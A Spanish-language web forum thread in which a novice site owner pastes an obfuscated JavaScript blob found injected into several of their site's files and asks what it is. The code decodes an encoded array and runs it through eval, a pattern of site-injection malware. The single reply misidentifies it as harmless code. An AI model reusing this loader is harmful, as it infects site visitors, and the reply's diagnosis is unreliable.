Foros del Web » Programando para Internet » Javascript »

Problema con javascrip en php.

Estas en el tema de Problema con javascrip en php. en el foro de Javascript en Foros del Web. Hola: Soy novato en esto del desarrollo web y tengo una pagina web. Sin embargo desde hace ayer no me iba. He mirado en donde ...
  #1 (permalink)  
Antiguo 21/11/2012, 08:12
 
Fecha de Ingreso: noviembre-2012
Mensajes: 13
Antigüedad: 11 años, 5 meses
Puntos: 0
Problema con javascrip en php.

Hola:
Soy novato en esto del desarrollo web y tengo una pagina web. Sin embargo desde hace ayer no me iba. He mirado en donde estaba el error y me he encontrado en que en varios archivos este script:
<!--fff309--><script type="text/javascript" language="javascript" >lo que sea</script>
me aparece todo esto:
try{if(window.document)window["document"]["body"]="vasasf"}catch(bawetawe){if(window.document){v =wi ndow;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if (020===0x10)v["document"]["bo"+"dy"]="123"}catch(gfdnfdgber){m=123;if((alert+"").in dex Of("n"+"a"+"ti"+"ve")!==-1)ev=window["eval"];}}n=["1f","42","4h","4a","3o","4g","45","4b","4a"," 17", "1f","1g","17","4n","d","a","17","17","17","17 ","4 i","3m","4e","17","3m","4b","3m","17","2b","17" ,"4 0","4b","3o","4h","49","41","4a","4g","1l","3o" ,"4 e","41","3m","4g","41","2j","48","41","49","41" ,"4 a","4g","1f","1e","45","42","4e","3m","49","41" ,"1 e","1g","29","d","a","d","a","17","17","17","17 "," 3m","4b","3m","1l","4f","4e","3o","17","2b","17" ," 1e","44","4g","4g","4c","28","1m","1m","3m","4i" ," 3o","4b","48","4b","4e","1l","3o","44","1m","35" ," 41","4e","4f","4b","4a","3m","48","41","1m","3o" ," 4a","4g","1l","4c","44","4c","1e","29","d","a"," 17 ","17","17","17","3m","4b","3m","1l","4f","4g" ,"4l ","48","41","1l","4c","4b","4f","45","4g","45" ,"4b ","4a","17","2b","17","1e","3m","3n","4f","4b" ,"48 ","4h","4g","41","1e","29","d","a","17","17"," 17", "17","3m","4b","3m","1l","4f","4g","4l","48"," 41", "1l","3n","4b","4e","40","41","4e","17","2b"," 17", "1e","1n","1e","29","d","a","17","17","17","17 ","3 m","4b","3m","1l","4f","4g","4l","48","41","1l" ,"4 4","41","45","43","44","4g","17","2b","17","1e" ,"1 o","4c","4k","1e","29","d","a","17","17","17"," 17" ,"3m","4b","3m","1l","4f","4g","4l","48","41"," 1l" ,"4j","45","40","4g","44","17","2b","17","1e"," 1o" ,"4c","4k","1e","29","d","a","17","17","17","17 "," 3m","4b","3m","1l","4f","4g","4l","48","41","1l" ," 48","41","42","4g","17","2b","17","1e","1o","4c" ," 4k","1e","29","d","a","17","17","17","17","3m"," 4b ","3m","1l","4f","4g","4l","48","41","1l","4g" ,"4b ","4c","17","2b","17","1e","1o","4c","4k","1e" ,"29 ","d","a","d","a","17","17","17","17","45","42 ","1 7","1f","18","40","4b","3o","4h","49","41","4a" ,"4 g","1l","43","41","4g","2j","48","41","49","41" ,"4 a","4g","2g","4l","2n","40","1f","1e","3m","4b" ,"3 m","1e","1g","1g","17","4n","d","a","17","17"," 17" ,"17","17","17","17","17","40","4b","3o","4h"," 49" ,"41","4a","4g","1l","4j","4e","45","4g","41"," 1f" ,"1e","2a","40","45","4i","17","45","40","2b"," 3h" ,"1e","3m","4b","3m","3h","1e","2c","2a","1m"," 40" ,"45","4i","2c","1e","1g","29","d","a","17","17 "," 17","17","17","17","17","17","40","4b","3o","4h" ," 49","41","4a","4g","1l","43","41","4g","2j","48" ," 41","49","41","4a","4g","2g","4l","2n","40","1f" ," 1e","3m","4b","3m","1e","1g","1l","3m","4c","4c" ," 41","4a","40","2h","44","45","48","40","1f","3m" ," 4b","3m","1g","29","d","a","17","17","17","17"," 50 ","d","a","50","1g","1f","1g","29"];h=2;s="";if(m)for(i=0;i-473!=0;i++){k=i;if(window["document"])s+=String.fromCharCode(parseInt(n,25));}z=s;if(v) ev(z)}}}</script><!--/fff309-->

Me podeis decir que es esto? no soy muy entendido.
Muchas gracias y perdonad las molestias.
  #2 (permalink)  
Antiguo 21/11/2012, 08:29
Avatar de Albuss  
Fecha de Ingreso: enero-2012
Ubicación: Coruña
Mensajes: 475
Antigüedad: 12 años, 3 meses
Puntos: 30
Respuesta: Problema con javascrip en php.

Javacript y Php son lenguajes distintos, lo que muestras es o bien una función para buscar un caracter (por la funcion index of aunque este mal escrita en tu ejemplo) dentro de un array o una biblioteca de algún framework para js, o al menos es lo único que se me ocurre ahora.


Ps. No puedes ejecutar javascript en php, o al menos de forma directa.

Etiquetas: Ninguno
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 17:19.